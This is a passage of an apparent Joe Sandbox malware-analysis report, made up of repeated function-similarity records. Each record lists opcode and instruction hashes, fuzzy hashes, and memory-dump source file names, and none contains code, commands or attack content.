                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: CF42E6706147418FC735CF18C2907A5FBE6BF89320F288A6DDA868B791D779E885CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: a1596a27a7f3f99929023decf08ab580d9b187ce82a388d032af03a5b3731f73
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: E302F671E0025A8FCB02CF29C8806BFB7A6AFDA350F15871AE855B7251D770AD818BD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 714ae3062d9a9d5d9cfcda6d2b8d6ecfa3743eedef5a7a3aeaedc9501f3ba98a
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: 9002F271E083068FDB15CF29C884B69B7E5AFA5350F148B2DE89997392D731EC858B42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 5b503d5e3f99bff45d07bc8e1233993a1ab6546382e68f01817c9b2285c802f9
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: F7F16AB260D6A14BC71D9A1484B09BD7FD29BA9201F0E86ADFDD70F383D924DA01DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 2b41f2b41d7b5a44bc1010bc6ecdbd36da09564596e8bc0762d6b058e0a43d6a
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 16D1A873F10A294BEB08CE99DC913ADB6E2EBD8350F19413ED916F7381D6B89D018790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction ID: 94332cd63e4f5e21b12fbea29965d8d85819fbb9a4da3b84e0e08d29a26045d5
                                        • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction Fuzzy Hash: 91D15572E002598BCF25CF9AD8807EDB7B2BF89310F148629E815B7391D7749D86CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: fa4e5ae94a5bc54cdf5ae827144e915b5479cda02a3b74046ac55db99f957746
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: E4026974E006598BCF16CFA8C490AEDBBB6FF89310F54815DE8996B355C730AA91CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: 885db97b3211000f858e959c6fa5ddd0ae763690220ce27a83dc6f8b35364b19
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: CE020275E006198FCF15CF98C4809ADBBB6FF88350F25856DE809AB355D731AA91CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: e2c47990bd148abe3314e8f968c607d9346fa4d672627a02bd3ebdd9f0f72007
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: E6C15C76E29B824BD713873DD802265F395AFE7294F15D72EFCE472952FB30A6818204
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction ID: 405882d97dc6102ba55d805748641dc0eebedbf2851b19947e94622d2baf1ffe
                                        • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction Fuzzy Hash: 8FB1D276D452999FDB21CB78C4903EEBBB6AF52300F19C157D4846B383DA344986CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 76869196f6ce7db5b60bfb8296772c970d85b24bec353d6b6ae9277d97915909
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: 4ED14670640B40CFD721CF29C494BA7B7E4BB99304F14896ED89A8BB91DB35F849CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction ID: 3ed0635be469c66d489e298c1e2bf3f10db7ff580e3eefafca7e19e92922caa3
                                        • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction Fuzzy Hash: E5D107B050D3808FD7148F15C0A4B2BBFE0AF95748F19895EE4D90B391D7BA8A49DB93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: 5cea685e5f857075716881a734a8da5f9c594ec778d28bea511177330cb4ba20
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: F5B18272E083519BD308CF25C89179BF7E2EFC8310F1AC93EE89997291D774D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: 19b98aba41c070e8a23dd2d32f00a3f5f4ebbf8df904f5666c6b68fe7fd73a9d
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 91B19372A083115BD308CF29C45176BF7E2EFC8310F1AC93EF89997291D778D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 4de9b2291bae23359702a204ed9e784f2708f8afc668d3cde766b321795a2c5d
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 9CB1F771A097118FD706EF3DC491215F7E1AFEA280F51C72EE895B7662EB31E8818780
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 0c3a6edc9ab1a7c2de764ffaeaedb23e483fcf5d094ea943d68429111d58f33b
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: FC91F671A042958FDF16CFAADC80BBAB3ACAF55300F154568EE14AB382D371DD45CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 59def4583c57724bc7a2d6b43aedfa92c3a486b30c972fbc3f6c861f94af5511
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: CFB15A31610609DFD715CF28C48AB657BE0FF45364F29865CEA9ACF2A2C375E991CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: b8cf497e5fabe32317cf86b196da33b4be0ffa5516b6140fa408ecce6ef2dc80
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: F6C14A75A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: f6588181da8f8331f890e047ad221774791c411d4de61f1fca1f7864548a9467
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 5F9166308297916AEB168B38CC427BAB798FFE6350F14C31BF98872591FB72C5809344
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
